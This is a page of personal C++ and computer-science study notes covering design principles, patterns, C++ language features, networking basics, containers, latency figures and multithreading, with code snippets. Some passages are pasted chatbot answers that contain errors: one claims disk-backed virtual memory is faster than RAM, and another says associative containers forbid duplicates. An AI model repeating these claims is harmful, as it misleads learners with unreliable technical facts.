    pthread_join(consumer_thread, NULL);

    // Destroy mutex and semaphores
    pthread_mutex_destroy(&mutex);
    sem_destroy(&empty);
    sem_destroy(&full);

    return 0;
}

SOLID

  1. Single Responsibility Principle (SRP)
  2. Open/Closed Principle (OCP)
  3. Liskov Substitution Principle (LSP)
  4. Interface Segregation Principle (ISP)
  5. Dependency Inversion Principle (DIP)

GRASP

Less common but another set of principles to consider.

  1. Information Expert: Assign responsibilities to the class that has the most information required to fulfill them.
  2. Creator: Assign the responsibility to create objects to the class that has the required information to do so.
  3. Controller: Assign the responsibility of managing the flow of information between objects to a separate controller class.
  4. Low Coupling: Design classes with minimal dependencies on each other to avoid tight coupling.
  5. High Cohesion: Design classes with a clear, single purpose to increase cohesion within the class.
  6. Polymorphism: Use polymorphism to allow for different behaviors to be implemented by objects of the same class.
  7. Pure Fabrication: Create separate classes to handle complex or specialized tasks that do not fit into existing classes.
  8. Indirection: Use intermediate classes to reduce direct coupling between classes.
  9. Protected Variations: Design classes to protect them from changes in external systems or dependencies.

C++ function parameters

For simple readonly types, pass by const value.

void func(const int p) {
}

For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider whether the type is trivially copyable: does it need only a shallow copy, or a deep copy?

void func(const big_type& p) {
}

If the first thing you do is make a copy, pass by non-const value.

void func(int p) {
}

If you want to modify the caller’s copy, pass by non-const reference.

void func(int& p) {
}

class or struct?

The only difference between a class and a struct is the default access level: members and base classes are public by default in a struct, and private by default in a class.

But typically a struct is used for “plain old data” or memory-mapped data where you want the members to be laid out in a predictable way (virtuals/inheritance add the complication of a vtable pointer.)

Either way, you can test your assertions at compile time with static_assert and the type traits header.

struct A {
  // public: <-- default for structs
  int x_;
};

If the data are constrained by an invariant – i.e., not all values are valid – use a class.

class B {
  private: // <-- default for classes
  int x_; // must be between 0-1000
};

What are the most difficult concepts in computer science?


Virtual memory

OpenAI:

  1. Increased memory capacity: Virtual memory allows a computer to address more memory than it physically has available. This increases the overall memory capacity of the system and allows it to run larger programs or multiple programs simultaneously.

  2. Efficient memory management: Virtual memory allows the computer to manage memory more efficiently by storing data and instructions in the hard drive and only loading them into physical memory when needed. This frees up physical memory for other tasks and reduces the chances of running out of memory.

  3. Cost-effective: Virtual memory reduces the need for expensive physical memory by utilizing the hard drive space as an extension of the physical memory. This makes it a cost-effective solution for increasing memory capacity.

  4. Better multitasking: With virtual memory, a computer can run multiple programs simultaneously without running out of physical memory. This improves the multitasking capabilities of the system and allows for smoother switching between applications.

  5. Enhanced system performance: Virtual memory can improve system performance by reducing the amount of time it takes to access data and instructions. By using virtual memory, the computer can access data and instructions stored in the hard drive faster than it would if it had to retrieve them from a physical memory location.

  6. Increased stability: Virtual memory can improve the stability of a system by preventing a single program from using up all the physical memory. If a program tries to use more memory than is available, virtual memory can allocate additional space from the hard drive, preventing the system from crashing.

  7. Flexibility: Virtual memory allows for flexibility in memory allocation. It can allocate more or less memory to specific programs based on their needs, allowing the system to optimize memory usage and performance.

  8. Support for larger programs: Virtual memory allows for the execution of larger programs that require more memory than what is physically available. This is particularly useful for applications that handle large amounts of data, such as video editing or 3D modeling software.

  9. Compatibility: Virtual memory is a standard feature in most modern operating systems, making it compatible with a wide range of computer systems. This allows for easy integration and use of virtual memory in various computing environments.

  10. Easy maintenance: Virtual memory is managed by the operating system, so users do not need to manually manage memory. This makes it easier to maintain and reduces the chances of memory-related errors or crashes.

Design patterns

The objective of design patterns is to provide well-tested and proven solutions to commonly occurring design problems in software development. These patterns provide a standard and reusable approach to designing software, making it easier to maintain, modify, and extend code. They also help in improving code readability and reducing development time, as developers can use the established patterns instead of creating new solutions from scratch. Additionally, design patterns promote best practices and encourage consistency in design, making it easier for developers to collaborate and understand each other’s code. The ultimate goal of design patterns is to produce high-quality, flexible, and maintainable software that meets the requirements of the end-users.

Categories

Common patterns

  1. Singleton Pattern: Ensures that only one instance of a class is created and provides a global access point to that instance.

  2. Factory Pattern: Used to create objects without exposing the creation logic to the client. It provides a way to create objects based on a common interface or parent class.

  3. Observer Pattern: Defines a one-to-many dependency between objects so that when one object changes state, all its dependents are notified and updated automatically.

  4. Adapter Pattern: Allows the interface of an existing class to be used as another interface. It is often used to make incompatible classes work together.

  5. Decorator Pattern: Allows behavior to be added to an individual object without affecting the behavior of other objects from the same class. It is often used to dynamically add new functionality to an object.

  6. Strategy Pattern: Defines a family of algorithms, encapsulates each one, and makes them interchangeable. It allows the algorithm to be selected at runtime without tightly coupling the client to the implementation.

  7. Template Method Pattern: Defines the skeleton of an algorithm in a method, allowing subclasses to provide some of the implementation details. It is often used to avoid duplication of code in similar algorithms.

  8. Iterator Pattern: Provides a way to access the elements of an aggregate object sequentially without exposing its underlying representation.

  9. Command Pattern: Encapsulates a request as an object, allowing it to be invoked at a later time. It also allows requests to be queued, logged, or undone.

  10. Facade Pattern: Provides a unified interface to a set of interfaces in a subsystem. It simplifies the interface of a complex system by providing a higher-level interface.

  11. Proxy Pattern: Provides a surrogate or placeholder for another object to control access to it. It is often used to add extra functionality to an object or to control its creation.

  12. Composite Pattern: Composes objects into tree structures to represent part-whole hierarchies. It allows clients to treat individual objects and compositions of objects uniformly.

  13. Bridge Pattern: Decouples an abstraction from its implementation so that the two can vary independently. It is often used to separate interface from implementation and to provide the flexibility for both to change without affecting each other.

  14. Flyweight Pattern: Reduces the number of objects created by sharing objects that are similar. It is often used to conserve memory and improve performance.

  15. Chain of Responsibility Pattern: Allows multiple objects to handle a request without specifying the exact handler. It creates a chain of objects that can each handle the request or pass it on to the next object in the chain.

Factory pattern

The factory design pattern is a creational design pattern that provides a way to create objects without specifying the exact class of object that will be created. This pattern encapsulates the object creation process in a separate class, known as the factory, which is responsible for creating objects based on certain criteria or parameters.

The main purpose of the factory design pattern is to promote loose coupling and maintainability by separating the object creation logic from the rest of the code. This allows for easier modification and extension of the code without impacting the client code.

The basic structure of the factory design pattern includes the following components:

  1. Factory Interface/Abstract Class: This is an interface or abstract class that defines the methods for creating objects. It may also contain common logic for object creation.

  2. Concrete Factory: This is a class that implements the factory interface and is responsible for creating specific types of objects based on the client’s request.

  3. Product Interface/Abstract Class: This is an interface or abstract class that defines the common properties and methods of the objects that will be created by the factory.

  4. Concrete Product: This is a class that implements the product interface and defines the specific properties and methods of the object.

  5. Client: This is the class that uses the factory to create objects, without having knowledge of the specific object class being created.

The process of using the factory design pattern involves the following steps:

  1. The client requests an object from the factory by passing the necessary parameters or criteria.

  2. The factory uses the passed parameters to determine which type of object to create.

  3. The factory creates the object and returns it to the client.

Overall, the factory design pattern provides a flexible way of creating objects by encapsulating the object creation process in a separate class. It also promotes code reusability and maintainability by allowing for easy modifications and extensions. It is commonly used in applications where the creation of objects is complex or there is a need for creating multiple types of objects.

Example of factory pattern

Store a system configuration in an external text file and construct at runtime using the factory pattern.
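
A minimal sketch of how that might look (the class and file names are my own assumptions, for illustration):

#include <fstream>
#include <iostream>
#include <memory>
#include <string>

// Common interface for the products
struct Component {
    virtual ~Component() = default;
    virtual void start() = 0;
};

struct Logger : Component {
    void start() override { std::cout << "logging started\n"; }
};

struct Database : Component {
    void start() override { std::cout << "database started\n"; }
};

// The factory maps a configuration string onto a concrete type
std::unique_ptr<Component> make_component(const std::string& name) {
    if (name == "logger") return std::make_unique<Logger>();
    if (name == "database") return std::make_unique<Database>();
    return nullptr;
}

int main() {
    // Each line of the (hypothetical) config file names a component
    std::ifstream config{"system.cfg"};
    for (std::string line; std::getline(config, line);)
        if (const auto component = make_component(line))
            component->start();
}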

Visitor pattern

The visitor design pattern is a behavioral design pattern in which a single operation is applied to a group of objects without modifying their classes. It allows for the separation of an algorithm from the objects it operates on, providing a way to add new operations without changing the classes of the objects on which the operation is performed.

The pattern consists of three main components: the visitor, the elements, and the client. The visitor is a class that contains the algorithm or operation that is to be performed on the elements. The elements are the objects on which the operation is to be performed. The client is responsible for creating the visitor and passing it to the elements to be visited.

The visitor pattern works by having the elements accept the visitor and call the appropriate method based on their type. The visitor then performs the operation on the element and can access its internal state if needed. This allows for different operations to be performed on different types of elements without modifying their classes.

One of the key benefits of using the visitor pattern is that it allows for the addition of new operations without changing the existing code. This makes it easy to add new features to an application without having to modify the existing codebase. It also promotes code reuse and separation of concerns, as the visitor encapsulates the algorithm and can be reused on different elements.

However, the visitor pattern can also have some downsides. It can make the code more complex and harder to understand, as the logic of the operation is spread across multiple classes. It also requires all elements to implement the visitor interface, which can be cumbersome in some cases.

In summary, the visitor design pattern is a useful tool for separating algorithms from the objects they operate on, allowing for the addition of new operations without modifying existing code. It promotes code reuse and separation of concerns, but can also make the code more complex.

Double dispatch

The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”

Double dispatch is a technique used in subtype polymorphism to enable objects to handle method calls differently based on the types of two objects involved in the call. This is achieved by having the method call first dispatched to the receiving object, and then dispatched again to the argument object, allowing both objects to determine how the call should be handled based on their specific types.

In other words, when a method is called on an object, the object itself determines how to handle the call based on its own type. Then, the method is called again on the argument object, and that object determines how to handle the call based on its own type. This allows for more specific and specialized behavior based on the types of both objects involved in the call.

Double dispatch is a form of dynamic binding, where the specific implementation of a method is determined at runtime based on the types of the objects involved. This allows for greater flexibility and extensibility in object-oriented code, as new subtypes can be added without having to modify existing code.

One common use case for double dispatch is in collision detection in video games. Each game object (such as a player character or an enemy) has its own collision detection method, and when two objects collide, the method is called on both objects. This allows each object to handle the collision differently based on its own type, enabling more realistic and varied interactions between objects in the game.

Overall, double dispatch is a powerful technique that allows for more dynamic and flexible behavior in object-oriented programming, and is a key aspect of subtype polymorphism.

Example of visitor pattern

Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.
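
A sketch (the type names are mine) of the classic double-dispatch visitor over a small shape hierarchy:

#include <iostream>

struct Circle;
struct Square;

// The visitor declares one overload per concrete shape
struct ShapeVisitor {
    virtual ~ShapeVisitor() = default;
    virtual void visit(const Circle&) = 0;
    virtual void visit(const Square&) = 0;
};

struct Shape {
    virtual ~Shape() = default;
    virtual void accept(ShapeVisitor&) const = 0;
};

// First dispatch: the virtual accept() selects the shape's dynamic type
// Second dispatch: the visit() overload selects the operation for that type
struct Circle : Shape {
    void accept(ShapeVisitor& v) const override { v.visit(*this); }
};

struct Square : Shape {
    void accept(ShapeVisitor& v) const override { v.visit(*this); }
};

// A new operation added without touching the shape classes
struct AreaPrinter : ShapeVisitor {
    void visit(const Circle&) override { std::cout << "circle area\n"; }
    void visit(const Square&) override { std::cout << "square area\n"; }
};

int main() {
    const Circle c;
    const Square s;
    AreaPrinter printer;
    c.accept(printer);
    s.accept(printer);
}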

Flyweight / singleton / memento

Hardware interface classes will typically be a const register map which is a flyweight pattern. This is also an example of a singleton pattern as it’s only initialised once regardless of how many instances are created. Additionally if registers are actually wired to discrete lines they might be read-only, so the memento pattern is used to store the internal state.

Reflection

“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”

See Wikipedia.

Dependency inversion

Dependency inversion is a design principle in software development that suggests that high-level modules or components within a system should not depend on low-level modules or components directly. Instead, both should depend on abstractions or interfaces, which allows for easier maintenance and flexibility in the system. This principle promotes decoupling and helps to reduce the impact of changes to one part of the system on other parts. It is often implemented through the use of inversion of control (IoC) frameworks and design patterns such as the dependency injection pattern.
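
A small sketch (the names are mine): the high-level service depends only on an abstraction, and the concrete implementation is injected.

#include <iostream>
#include <memory>
#include <string>

// Abstraction that both the high- and low-level modules depend on
struct MessageSink {
    virtual ~MessageSink() = default;
    virtual void send(const std::string&) = 0;
};

// Low-level detail
struct ConsoleSink : MessageSink {
    void send(const std::string& msg) override { std::cout << msg << '\n'; }
};

// High-level module: depends only on the interface, injected at construction
class AlertService {
    std::shared_ptr<MessageSink> sink_;
public:
    explicit AlertService(std::shared_ptr<MessageSink> sink) : sink_{std::move(sink)} {}
    void alert() { sink_->send("something happened"); }
};

int main() {
    AlertService service{std::make_shared<ConsoleSink>()};
    service.alert();
}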


The rules of code

  1. A single file should contain fewer than 20000 lines of code
  2. It would be nice if a single routine could fit into 1000 lines of code (makes testing easier)
  3. Ensure comments are ignored by prefixing “todo”
  4. Use consistent formatting: even better, don’t bother and let clang-format do it
  5. Make things constant: it’s much easier to reason about code when the data are immutable
  6. Unit testing is awesome and will almost certainly catch on

Unit testing

A test is not a unit test if it:

  1. talks to the database
  2. communicates across the network
  3. touches the file system
  4. can’t run at the same time as any of your other unit tests
  5. requires you to do special things to your environment (such as editing config files) to run it

See the complete article.


Branching

Branchless programming

Branchless programming is an important approach in low-latency code. It may offer performance improvements but potentially at the cost of maintainability.

#include <iostream>

int main() {
    int x = 10;
    int y = 20;

    // Using a branch statement
    int max_val_branch = (x > y) ? x : y;
    std::cout << "Max value using branch statement: " << max_val_branch << std::endl;

    // Using branchless programming
    int max_val_branchless = y ^ ((x ^ y) & -(x > y));
    std::cout << "Max value using branchless programming: " << max_val_branchless << std::endl;

    return 0;
}

Branch prediction

In summary, branch prediction focuses on predicting the outcome of a specific branch instruction to enable speculative execution, while branch target prediction aims to predict the target address of a branch to reduce the delay in fetching and decoding subsequent instructions. Both techniques are utilized in modern processors to optimize instruction execution and improve overall performance.

OpenAI: Branch prediction is a technique used in computer processors to improve the performance of branch instructions, which are instructions that can cause the program to jump to another part of the code. Branch prediction works by predicting the outcome of a branch instruction and starting the processing of the predicted instruction before the actual outcome is known.

There are two types of branch prediction: static and dynamic. Static branch prediction uses a fixed rule to predict the outcome of a branch instruction based on the program’s structure and previous executions. This method is simple and fast but can be inaccurate if the prediction rule does not match the actual outcome.

Dynamic branch prediction, on the other hand, uses past execution history to make predictions. It maintains a table of previous branch instructions and their outcomes, and uses this information to make predictions for future branch instructions. This method is more accurate but requires more resources and can be slower.

The main goal of branch prediction is to reduce the number of stalled cycles in the processor. When a branch instruction is encountered, the processor has to stop and wait for the outcome before it can continue processing, resulting in wasted cycles. By predicting the outcome and starting the processing of the predicted instruction, branch prediction can help reduce the number of stalled cycles and improve the overall performance of the processor.

Branch prediction can also be improved by using more sophisticated algorithms such as neural networks or machine learning techniques to analyze the patterns and make more accurate predictions. Additionally, branch prediction can be combined with other techniques such as speculative execution, where the processor predicts and executes multiple possible outcomes, to further improve performance.

However, branch prediction is not always accurate and can lead to incorrect predictions, resulting in wasted cycles and decreased performance. This is known as a branch misprediction. To mitigate this issue, processors may have mechanisms in place to detect and handle mispredictions, such as flushing the incorrectly predicted instructions and restarting from the correct branch instruction.

Overall, branch prediction is an important technique for improving the performance of modern processors by reducing the impact of branch instructions on the processor’s execution pipeline.

C++ attributes

When the [[likely]] attribute is applied, it suggests to the compiler that the branch following the attribute is frequently executed. This allows the compiler to prioritize the optimization of code paths that are more likely to be taken, potentially resulting in better performance.

However, it’s important to note that the [[likely]] attribute is just a hint, and it does not guarantee any specific behavior or optimization. The behavior of [[likely]] can vary depending on the compiler and its version. Some compilers may ignore the attribute altogether, while others may consider it as a hint for optimization.
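
A small sketch of the attribute in use; the hot/cold split here is made up, and whether it changes the generated code at all depends on the compiler.

#include <cstdio>

// Hint to the compiler that errors are rare: the common path can be laid out
// to fall through without a taken branch.
void handle(int status) {
    if (status == 0) [[likely]] {
        std::puts("ok");
    } else [[unlikely]] {
        std::puts("error");
    }
}

int main() {
    handle(0);
    handle(1);
}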

References


Argument dependent lookup (aka Koenig lookup)

Argument-dependent lookup, also known as ADL, or Koenig lookup, is the set of rules for looking up the unqualified function names in function-call expressions, including implicit function calls to overloaded operators. These function names are looked up in the namespaces of their arguments in addition to the scopes and namespaces considered by the usual unqualified name lookup.

Notice the cbegin and cend calls below don’t specify a namespace: see ADL.

#include <algorithm>
#include <iostream>
#include <iterator>
#include <vector>

int main() {

    const std::vector v{1, 2, 3, 4, 5};

    // cbegin/cend are found by ADL because v lives in namespace std
    std::copy(cbegin(v), cend(v), std::ostream_iterator<int>(std::cout, "\n"));
}

C++ standards

The big things for me are ranges and views: they let you effortlessly express and manipulate ranges of data with zero iterators; they read naturally and are also lazily evaluated (and gcc 14 brings ranges::to<> to the party). Concepts I’ve used a little, but mostly to narrow the allowed types of an auto parameter: e.g., std::floating_point auto.
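
As a small sketch of both features (the data and names are made up), here is a lazily evaluated view pipeline plus a constrained auto parameter; it should build with a C++20-capable compiler.

#include <concepts>
#include <iostream>
#include <ranges>
#include <vector>

// Constrained auto parameter: only floating-point types are accepted
auto halve(std::floating_point auto x) { return x / 2; }

int main() {
    const std::vector numbers{1, 2, 3, 4, 5, 6, 7, 8};

    // Lazily filter and transform without a single iterator in sight
    auto pipeline = numbers
        | std::views::filter([](int n) { return n % 2 == 0; })
        | std::views::transform([](int n) { return n * n; });

    for (const int n : pipeline)
        std::cout << n << ' ';
    std::cout << '\n' << halve(3.0) << '\n';
}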

I’ve attempted to deep dive into templates a few times and it’s really quite an unpleasant language! However, whilst not a recent addition, constexpr is becoming increasingly supported; it gives you the readability of “normal” code with the potential performance benefits of compile-time. And it also finds UB! However, you quickly hit the issue where something isn’t constexpr so you have to either implement it yourself or not bother.

Coroutines are quite high-profile but I haven’t got into them yet. Finally, the multidimensional array operator seemed like a game changer but I’ve only used it once!

You’ll have to reach into gcc 14 but std::print is very welcome; as are modules (which might be available in 13.2 with the -fmodules-ts flag).

Notable mentions from C++17 are structured bindings and execution policy.

C++26

C++23

See the presentation by Marc Gregoire (CppCon 2022).

You’ve gotta track gcc head to avoid disappointment.

Ranges and views (part two)

A lot of effort has gone into ranges and views in C++23.

std::ranges

std::views

C++20

C++17

Also see cppreference.

C++14

C++14 is an extension and improvement of C++11.

C++11


Networking

“Please Do Not Take Salami Pizza Away”

See OSI on Wikipedia.

Layer | Description | Protocols
Application | Provides network services to applications | HTTP, FTP, SMTP
Presentation | Formats data for presentation to the Application layer | JPEG, ASCII, MPEG
Session | Manages communication sessions between devices | NetBIOS, RPC
Transport | Ensures reliable communication between devices | TCP, UDP
Network | Routes data between devices on different networks | IP, ICMP, OSPF
Data Link | Manages data transmission between devices on the same network | Ethernet, Wi-Fi, PPP
Physical | Transmits raw data between devices | Ethernet cables, fiber optics

Three way handshake

The TCP three way handshake is a method used to establish a connection between two devices using the Transmission Control Protocol (TCP). It is a three-step process that allows devices to synchronize and establish a reliable connection before data transmission can begin. The steps involved in the TCP three way handshake are as follows:

Step 1: SYN (Synchronize) The first step in the TCP three way handshake is the SYN packet. The client device sends a SYN packet to the server with a randomly generated sequence number. This packet indicates the client’s intention to establish a connection with the server.

Step 2: SYN-ACK (Synchronize-Acknowledge) Upon receiving the SYN packet, the server responds with a SYN-ACK packet. This packet contains an acknowledgment of the client’s sequence number and a randomly generated sequence number of its own. It also confirms the server’s readiness to establish a connection.

Step 3: ACK (Acknowledgment) In the final step, the client sends an ACK packet to the server, which acknowledges the server’s sequence number. This packet also confirms the client’s readiness to start data transmission. At this point, a TCP connection is established between the two devices, and data transmission can begin.

Overall, the TCP three way handshake ensures that both devices are ready to communicate and that they agree on the initial sequence numbers. It also helps to prevent data loss and ensure reliable data transmission between the two devices.

SYN stands for “synchronise”.

=> SYN
<= SYN-ACK
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
<= FIN-ACK
=> ACK

The C++ Standard Library containers

  1. Efficient Memory Management: The Standard Library containers are designed to manage memory efficiently, which means they use less memory and have better performance compared to user-defined containers.

  2. Standardized Interface: All the containers in the Standard Library are standardized, which means they have a common set of member functions and behaviors. This makes it easy to learn and use different containers without having to learn new syntax and semantics.

  3. Wide Range of Containers: The Standard Library provides a wide range of containers such as vector, list, map, set, etc., each designed for a specific purpose. This allows developers to choose the appropriate container for their needs without having to reinvent the wheel.

  4. High-Quality Implementation: The containers in the Standard Library are thoroughly tested and optimized by experts, making them highly reliable and robust. This ensures that the containers perform efficiently and are free from bugs.

  5. Compatibility: The Standard Library containers are compatible with different compilers and platforms, making it easy to write portable code. This means that the same code can be used on different systems without any modifications.

  6. Extensibility: The Standard Library containers are designed to be easily extensible, allowing developers to add their own customizations and functionalities to the containers if needed.

  7. Comprehensive Algorithms: The Standard Library also provides a wide range of algorithms that can be used with the containers. These algorithms are optimized for the containers and provide efficient solutions to common problems.

  8. Community Support: The Standard Library containers are widely used by developers, which means there is a large community of users who can provide support and share their knowledge and experience.

  9. Time-Saving: Using the Standard Library containers saves time and effort as developers do not have to write their own containers from scratch. This allows them to focus on the logic and functionality of their code rather than implementing basic data structures.

  10. Standardization: As the name suggests, the Standard Library containers are part of the C++ Standard, which means they are widely accepted and recognized as a standard way of implementing containers in C++. This ensures consistency and compatibility among different codebases and libraries.

  11. Vector

  12. List

  13. Deque

  14. Array

  15. Set

  16. Multiset

  17. Map

  18. Multimap

  19. Unordered_set

  20. Unordered_multiset

  21. Unordered_map

  22. Unordered_multimap

  23. Stack

  24. Queue

  25. Priority_queue

  26. Bitset

  27. Forward_list

  28. Span

  29. Valarray

  30. String

  31. Wstring

  32. U16string

  33. U32string

  34. String_view

Categories of containers

Sequence and associative containers are two types of containers used in programming to store and organize data. They have some similarities, but also some distinct differences that make them useful for different purposes.

Sequence containers, also known as linear containers, store elements in a specific order and allow for sequential access to these elements. This means that the elements are stored in a linear structure, such as a vector, list, or deque, and can be accessed one after the other. The elements in a sequence container are typically accessed using an index or iterator, and the order of elements remains fixed unless explicitly changed by the programmer. This makes sequence containers useful for tasks such as sorting, searching, and manipulating data in a specific order.

On the other hand, associative containers store elements in a data structure that allows for efficient retrieval based on a key value. This means that instead of accessing elements by their position in the container, they are accessed by a specified key value. Examples of associative containers include maps, sets, and hash tables. These containers are useful for tasks that involve quickly retrieving specific elements based on their key value, rather than searching through the entire container.

One key difference between sequence and associative containers is the way they store elements. Sequence containers typically use dynamic arrays, linked lists, or double-ended queues to store data, while associative containers use data structures like binary search trees, hash tables, or red-black trees. This difference in storage method also affects the performance of operations on these containers. For example, sequence containers have efficient insertion and deletion operations at the beginning or end of the container, while associative containers have efficient retrieval operations based on key values.

Another difference between sequence and associative containers is the way they handle duplicate elements. In sequence containers, duplicate elements can be stored multiple times, while in associative containers, duplicate elements are not allowed. This is because the key value must be unique in associative containers to efficiently retrieve elements.

In summary, sequence containers are ideal for storing and accessing elements in a specific order, while associative containers are better suited for quickly retrieving elements based on a key value. The choice between these two types of containers depends on the specific needs of the program and the type of data being stored.
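
A small illustrative sketch of the difference in access style, assuming an arbitrary name-to-age mapping: a linear scan over a sequence container versus a keyed lookup in an associative container.

#include <algorithm>
#include <iostream>
#include <map>
#include <string>
#include <vector>

int main() {
    // Sequence container: order is whatever we put in; lookup is a linear scan
    const std::vector<std::pair<std::string, int>> ages_vec{
        {"alice", 42}, {"bob", 37}};
    const auto it = std::ranges::find_if(
        ages_vec, [](const auto& p) { return p.first == "bob"; });
    if (it != ages_vec.cend())
        std::cout << it->second << '\n';

    // Associative container: keys are unique and lookup is by key (O(log n))
    const std::map<std::string, int> ages_map{{"alice", 42}, {"bob", 37}};
    std::cout << ages_map.at("bob") << '\n';
}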

Choosing a container


The magnitude of it all

In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.

                        1 000  kilo | milli .001
                    1 000 000  mega | micro .000 001
                1 000 000 000  giga | nano  .000 000 001
            1 000 000 000 000  tera | pico  .000 000 000 001
        1 000 000 000 000 000  peta | femto .000 000 000 000 001
    1 000 000 000 000 000 000   exa | atto  .000 000 000 000 000 001
1 000 000 000 000 000 000 000 zetta | zepto .000 000 000 000 000 000 001

See list of SI prefixes.

You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc – but most people won’t know what you’re talking about. Also, manufacturers tend to use 1000^3 rather than 2^30 because it makes their capacity figures look better.

Important speeds you should be aware of

See why is everyone in such a rush?

1/1000000000 second == 1 nanosecond 

Approximate durations of typical operations (rounded to help remember.)

Action | Duration (nanoseconds)
L1 cache read, variable increment | <1
Branch misprediction (how do you measure this?) | 5
L2 cache read, std::atomic | 10
std::mutex/scoped_lock | 20
Fetch from main memory | 100
Semaphore acquire | 200
Send 2KiB over 1Gbps network | 20,000
Create a std::thread | 20,000
Send packet from US to Europe and back | 200,000,000

Object-oriented programming

Object-oriented programming (OOP) is a programming paradigm that focuses on creating and organizing code into objects that have properties and behaviors. These objects can interact with each other to perform tasks and solve problems. OOP is based on the concept of real-world objects, allowing for a more intuitive and organized approach to programming.

The main principles of OOP are encapsulation, abstraction, inheritance, and polymorphism. Encapsulation refers to the ability to hide the implementation details of an object and only expose the necessary information. Abstraction allows for the creation of simplified models of complex systems, making it easier to manage and understand. Inheritance allows objects to inherit properties and behaviors from a parent object, promoting code reuse and reducing redundancy. Polymorphism allows objects to have different forms or behaviors depending on the context in which they are used.

One of the key benefits of OOP is modularity, as objects can be created and modified independently, making it easier to maintain and update code. OOP also promotes code reusability, as objects can be reused in different parts of a program or in different programs altogether.

Some popular programming languages that use OOP include Java, C++, and Python. OOP is widely used in software development and is considered a powerful and efficient approach to programming complex systems.

Polymorphism

  1. Ad-hoc Polymorphism: This type of polymorphism is also known as function overloading or operator overloading. It allows different functions or operators to have the same name but different implementations based on the types of the input parameters. This is achieved by using function or operator overloading.

  2. Parametric Polymorphism: This type of polymorphism is also known as generic programming. It allows functions or types to be written in a way that can handle different data types without specifying them beforehand. This is achieved by using templates in C++ or generics in Java.

  3. Subtype Polymorphism: This type of polymorphism is also known as inheritance or subtype substitution. It allows a subclass to be treated as its superclass, thereby inheriting all its properties and methods. This allows for code reusability and flexibility in object-oriented programming.

  4. Inclusion Polymorphism: This type of polymorphism is also known as interface polymorphism. It allows different objects to be treated in a similar way based on their common interface or shared behavior. This is achieved by implementing interfaces in Java or using virtual functions in C++.

  5. Coercion Polymorphism: This type of polymorphism involves implicit type conversions between different data types. This can happen during operations between different data types, such as converting an integer to a float when performing a division operation.

  6. Overriding Polymorphism: This type of polymorphism allows a subclass to override a method or property of its superclass with its own implementation. This allows for customization and specialization of behavior in subclasses.

Virtual destructors

A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.

Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if it is deleted via a pointer to the polymorphic base class.
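
A minimal sketch (Animal and Dog are made up): deleting the derived object through a base pointer is only safe because the base destructor is virtual, and the type-trait check mentioned above can assert this at compile time.

#include <iostream>
#include <memory>
#include <type_traits>

struct Animal {
    virtual ~Animal() = default;   // virtual: deleting via Animal* is safe
    virtual void speak() const = 0;
};

struct Dog final : Animal {
    void speak() const override { std::cout << "woof\n"; }
    ~Dog() override { std::cout << "~Dog\n"; }
};

// Compile-time check mentioned above
static_assert(std::has_virtual_destructor_v<Animal>);

int main() {
    const std::unique_ptr<Animal> pet = std::make_unique<Dog>();
    pet->speak();
}   // ~Dog runs here because ~Animal is virtual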

Virtual function specifier

The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).

In derived classes, you should mark overridden methods as override to express intention and also protect from the base class being changed unwittingly.

Virtual tables

A non-virtual class has a size of 1 because in C++ classes can’t have zero size (objects declared consecutively can’t have the same address.)

A virtual class has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each virtual-class.
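
A quick sketch you can verify with static_assert; the exact sizes are implementation details, so these assertions assume a mainstream 64-bit ABI.

struct Plain { };                              // no virtual functions
struct Poly  { virtual ~Poly() = default; };   // polymorphic

static_assert(sizeof(Plain) == 1);             // objects can't be zero-sized
static_assert(sizeof(Poly) == sizeof(void*));  // hidden vtable pointer (8 on 64-bit)

int main() {}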

RAII

RAII stands for Resource Acquisition Is Initialization and is a programming technique, most prominent in C++ (and other languages with deterministic object destruction, such as Rust), used to manage resources and ensure proper resource allocation and deallocation. It is a concept that ties the lifetime of a resource to the lifetime of an object, ensuring that the resource is acquired when the object is created and released when the object is destroyed.

The main idea behind RAII is to use objects to manage resources such as memory, files, database connections, or any other limited and shared resource. The object acquires the resource in its constructor and releases it in its destructor, thus ensuring that the resource is always properly managed, even in the case of exceptions or unexpected program termination.

RAII is based on the principle of encapsulation, where the resource is tied to the object and can only be accessed through it. This ensures that the resource is not accidentally released or accessed by other parts of the code, preventing potential bugs and memory leaks.

RAII also allows for efficient resource management, as the resource is acquired and released automatically without the need for explicit calls from the programmer. This reduces the risk of forgetting to release a resource and improves code readability and maintainability.

In summary, RAII is a powerful concept that helps manage resources in a safe, efficient, and reliable way, making it an essential technique in modern programming languages.
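
A minimal sketch of the idiom wrapping a C FILE* (in real code you would normally reach for existing RAII types such as std::fstream, std::unique_ptr or std::lock_guard rather than rolling your own):

#include <cstdio>
#include <stdexcept>

// Owns a FILE*: acquired in the constructor, released in the destructor
class File {
public:
    explicit File(const char* path) : handle_{std::fopen(path, "w")} {
        if (handle_ == nullptr)
            throw std::runtime_error{"failed to open file"};
    }

    ~File() { std::fclose(handle_); }

    // Non-copyable: exactly one owner of the handle
    File(const File&) = delete;
    File& operator=(const File&) = delete;

    void write(const char* text) { std::fputs(text, handle_); }

private:
    std::FILE* handle_;
};

int main() {
    File file{"example.txt"};
    file.write("hello\n");
}   // file closed here, even if write threw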


Multithreading

Multithreaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.

Why use multithreading? For performance and/or separation of concerns.

Reentrancy

A routine can be described as reentrant if it can be interrupted without leaving the operation partially complete: the invariants remain true.

Invariants

A good way to reason about your code is to consider the invariants that must be true at any given point in time. For a linked list, node A’s next pointer must point to node B and node B’s previous pointer must point to node A. However, if you are deleting an element from a linked list there will be a period where this invariant does not hold, and you must acquire mutual access to both nodes whilst the list is being updated; otherwise another thread may see the list in an invalid state.

